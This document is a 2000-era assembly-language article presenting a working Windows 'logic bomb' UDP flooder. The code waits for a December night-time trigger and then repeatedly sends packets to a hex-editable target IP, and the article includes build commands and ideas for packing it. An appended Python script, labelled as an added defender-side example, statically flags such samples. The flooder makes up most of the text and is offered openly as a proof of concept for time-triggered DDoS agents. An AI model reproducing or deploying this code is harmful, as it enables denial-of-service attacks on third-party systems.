; Frost_Byte [S/I]   Saturday, July 22nd, 2000

;---------------Main Ramblings---------------
; The following code is a demonstration of an idea which I have
; had for quite a while, but never felt like sitting down and typing
; out. One of the problems with the DDOS servers is that commands are
; sent back and forth, but what if the Logic Bomb ideals were used to
; make basically a "ticking timebomb" ready to pounce on a site when
; certain conditions are met? The further away the attack is set...the
; more systems would be acquired. In turn, the longer the binaries are
; floating about, there is a higher probability that the code will be
; found and preventative measures will be taken. All I am doing is presenting
; this idea and a simple demonstration. The file loads, checks to see if
; it is December, and after 10:00 pm. If so...the attack ensues. It sends
; 10 1K packets (which are the first 1K of the executable itself..just for
; kicks, heh). Then, the program waits 30 seconds, and tries again. At
; any error (such as not being able to initialize winsock) it jumps to the 30
; second wait. Basically, the program continuously loops until the process is
; killed. I incorporated no API-call hiding, Re-starting on boot, or Process
; hiding methods...this is just proof of what could be done. Also, by the
; allocating of bytes..one EXE can be hexedited for a different IP to attack,
; and the file can be compressed (UPX threw it down to about 3K). This was tried
; on my Winnt 4 box to attack a Linux box over my LAN, and it seemed relatively
; stable and wasn't a real RAM-hog. BTW...hope you enjoy the commenting...

;-------------Hello Hello-------------
; I'm going to give a hello to Miss Ashley, A^T (thanks for catching a packet for me),
; and to my new gf Miss Jill.

;-------------Up-and-coming items-------------
; Have a Binder/Stub about 75% complete that has a 2-4K stub....a Commandprompt redirector
; in TASM, and other numerous odds and ends....

;-------------Outwards Out Words....-------------
; I'd just like to thank you for at least looking at this article, and I look forward to
; bringing more ideas to light. Later oh...

;-----Compiling-----
; tasm /mx /m1 UDPer
; tlink32 -Tpe -aa -c -x UDPer,,,import32.lib

;------------------------------------------------------------------------------------
;--------------------------------------The-Code--------------------------------------
;------------------------------------------------------------------------------------

.386
locals
jumps
.model Flat ,StdCall

;----------\Structures\----------
WSAdata STRUC
  wVersion        dw ?
  wHighVersion    dw ?
  szDescription   db ?
  szSystemStatus  db ?
  iMaxSockets     dw ?
  iMaxUdpDg       dw ?
  lpVendorInfo    dw ?,?
WSAdata ENDS

sockaddr_in STRUC
  sin_family      dw ?
  sin_port        dw ?
  sin_addr        dd 0
  sin_zero        db 8 dup (0)
sockaddr_in ENDS

SYSTEMTIME STRUC
  wYear           dw ?
  wMonth          dw ?
  wDayOfWeek      dw ?
  wDay            dw ?
  wHour           dw ?
  wMinute         dw ?
  wSecond         dw ?
  wMilliseconds   dw ?
SYSTEMTIME ENDS
;----------/Structures/----------

;----------\API Declarations\----------
; API for Logic Bomb data
extrn GetLocalTime:PROC
extrn Sleep:PROC

; Winsock API calls
extrn WSAStartup:PROC
extrn WSACleanup:PROC
extrn htons:PROC
extrn bind:PROC
extrn socket:PROC
extrn inet_addr:PROC
extrn sendto:PROC
extrn closesocket:PROC
;----------/API Declarations/----------

.Data
;----------\Winsock-used Data\----------
WSAdats         WSADATA ?
sin1            sockaddr_in ?
sin2            sockaddr_in ?
INADDR_ANY      equ 000000000h
sockaddr_size   equ 010h
saddr_len       dw 16
MySocket        dd 0
;----------/Winsock-used Data/----------
MySysTime       SYSTEMTIME ?
AttackedAddr    db '127.0.0.1'          ; Localhost, but leave enough nulls afterwards
                db 7 dup (0)            ; so that the IP can be hexedited
                                        ; xxx.xxx.xxx.xxx+NULL allocated

.Code
Start_Code:
startsocks:
;----------\Socket initialization & Configuration\----------
        call    WSAStartup, 0202h, offset WSAdats       ; Initialize Winsock
        cmp     eax,-1
        jz      error
        call    socket, 002h, 002h, 011h                ; Socket ( AF_INET , SOCK_DGRAM , IPPROTO_UDP)
        test    eax,eax
        jb      error
        mov     MySocket, eax

        call    htons, eax                              ; Set up Local Socket & Bind the settings
        mov     [sin1.sin_port],ax                      ; Using the current socket handle as the source
        mov     [sin1.sin_family],002h                  ; port for a bit of randomness
        mov     [sin1.sin_addr],INADDR_ANY
        call    bind, MySocket, offset sin1, sockaddr_size
        cmp     eax,-1
        jz      error

        call    htons, 200                              ; Set up the remote address:
        mov     [sin2.sin_port],ax                      ; destination port 200 and the
        mov     [sin2.sin_family],002h                  ; IP string held in AttackedAddr
        call    inet_addr, offset AttackedAddr
        mov     [sin2.sin_addr],eax
;----------/Socket initialization & Configuration/----------

;----------\Logic Bomb\----------
        call    GetLocalTime, offset MySysTime
        cmp     MySysTime.wMonth, 12                    ; Is it the 12th month (Dec)?
        jnz     error                                   ; If not..let's stop
        cmp     MySysTime.wHour, 20                     ; Is it 10:00pm or later?
        jle     error                                   ; If not..let's stop
;----------/Logic Bomb/----------

;----------\The UDP Bomb\----------
        xor     ecx,ecx
Looper:
        inc     ecx
        push    ecx
        call    sendto, MySocket, offset Start_Code, 1024, 0, offset sin2, sockaddr_size ; Long call for
        cmp     eax,-1                                  ; the UDP send
        jz      error
        call    Sleep, 500                              ; Good to keep a modem from dying
        pop     ecx
        cmp     ecx,10
        jnz     Looper                                  ; Send 10 packets (packet is just the
                                                        ; first 1K of this program...saves some
                                                        ; bytes instead of using a constant
                                                        ; string)
;----------\The UDP Bomb\----------

error:
        call    closesocket, MySocket
        call    WSAcleanup
        call    Sleep, 30000                            ; Sleep to keep modems from flooding
        jmp     startsocks                              ; themselves off and to keep traffic
End Start_Code                                          ; from being too outlandish
End
;-------------------------------------------------------------------------------
;-------------------------------------------------------------------------------
;-------------------------------------------------------------------------------
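
; Added example, not part of the original listing or its author's code: a defender-side
; static triage in Python that looks for what the text above describes, namely the clock
; and Winsock imports together with an IPv4 string NUL-padded to a 16-byte field, and
; reports the configured target. It assumes an unpacked sample that imports by name; the
; function names and the sample bytes are constructed for this example.

```python
import re

# Import names the listing declares with `extrn`. Assumption: the sample is
# unpacked and imports by name, so these appear as NUL-terminated ASCII.
CLOCK_APIS = (b"GetLocalTime", b"Sleep")
SEND_APIS = (b"WSAStartup", b"inet_addr", b"sendto")

# Dotted quad followed by NULs: the "xxx.xxx.xxx.xxx+NULL" field (16 bytes).
QUAD = re.compile(rb"(?<![0-9.])((?:\d{1,3}\.){3}\d{1,3})(\x00+)")
FIELD_LEN = 16


def padded_ip_fields(blob):
    """Return (offset, ip) for IPv4 strings NUL-padded to at least 16 bytes."""
    hits = []
    for m in QUAD.finditer(blob):
        ip, pad = m.group(1), m.group(2)
        valid = all(int(octet) <= 255 for octet in ip.split(b"."))
        if valid and len(ip) + len(pad) >= FIELD_LEN:
            hits.append((m.start(1), ip.decode("ascii")))
    return hits


def triage(blob):
    """Summarise the static indicators present in a sample's raw bytes."""
    clock = [a.decode() for a in CLOCK_APIS if a + b"\x00" in blob]
    send = [a.decode() for a in SEND_APIS if a + b"\x00" in blob]
    targets = padded_ip_fields(blob)
    return {
        "packed": b"UPX!" in blob,  # UPX magic: unpack first, then re-run
        "clock_apis": clock,
        "send_apis": send,
        "targets": targets,
        "suspicious": len(clock) == len(CLOCK_APIS)
        and len(send) == len(SEND_APIS) and bool(targets),
    }


# Constructed sample bytes (not a real binary): import names plus a padded
# target field holding a documentation address.
SAMPLE = (b"\x00\x00GetLocalTime\x00\x00\x00Sleep\x00"
          b"\x00\x00WSAStartup\x00\x00\x00inet_addr\x00\x00\x00sendto\x00"
          b"\x10\x00" + b"192.0.2.10".ljust(16, b"\x00") + b"\xff")

if __name__ == "__main__":
    print(triage(SAMPLE))
```

; A true `packed` flag means the import names and the address field are compressed away,
; so unpack the sample before trusting an empty result.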